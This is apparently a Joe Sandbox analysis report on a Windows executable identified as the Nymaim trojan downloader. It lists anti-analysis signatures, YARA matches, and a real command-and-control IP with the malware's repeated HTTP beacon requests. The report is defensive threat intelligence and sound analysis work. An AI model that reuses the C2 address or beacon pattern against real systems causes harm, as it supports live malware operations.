Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565650
MD5:bd23f2ee2aea0a9c0464bc44292485fc
SHA1:35b9012235c5a7c3094fc87f5a54fc542e8b78ab
SHA256:28c26c34bdb7a826385868133025f41dcb9f5313bb26d1a2ef365d3a9f913bd3
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BD23F2EE2AEA0A9C0464BC44292485FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.3.file.exe.4a20000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.2.file.exe.4930e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubesAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubRAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubBAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosublAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a20000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 31%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04933837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494798E FindFirstFileExW,0_2_0494798E

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl
                Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB8750_2_005DB875
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D90DF0_2_005D90DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DE1480_2_005DE148
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053D9BE0_2_0053D9BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D5A160_2_005D5A16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C2A300_2_005C2A30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D5A3E0_2_004D5A3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00513A240_2_00513A24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CAA340_2_004CAA34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E4B770_2_005E4B77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00472B300_2_00472B30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DFBE30_2_005DFBE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00520B8C0_2_00520B8C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E1C5A0_2_005E1C5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D0CCC0_2_005D0CCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D355D0_2_004D355D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D75CC0_2_005D75CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CEDE70_2_005CEDE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EC68A0_2_004EC68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473E950_2_00473E95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DCFCC0_2_005DCFCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D24970_2_006D2497
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493EE2E0_2_0493EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049459950_2_04945995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493B9370_2_0493B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493F1700_2_0493F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04940BA70_2_04940BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0493AA07 appears 35 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9947045846602972
                Source: file.exeStatic PE information: Section: xdrminwo ZLIB complexity 0.9920369017936886
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04788464 CreateToolhelp32Snapshot,Module32First,0_2_04788464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1991168 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of xdrminwo is bigger than: 0x100000 < 0x1a3e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdrminwo:EW;fjbklart:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1f0aaa should be: 0x1e6944
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xdrminwo
                Source: file.exeStatic PE information: section name: fjbklart
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
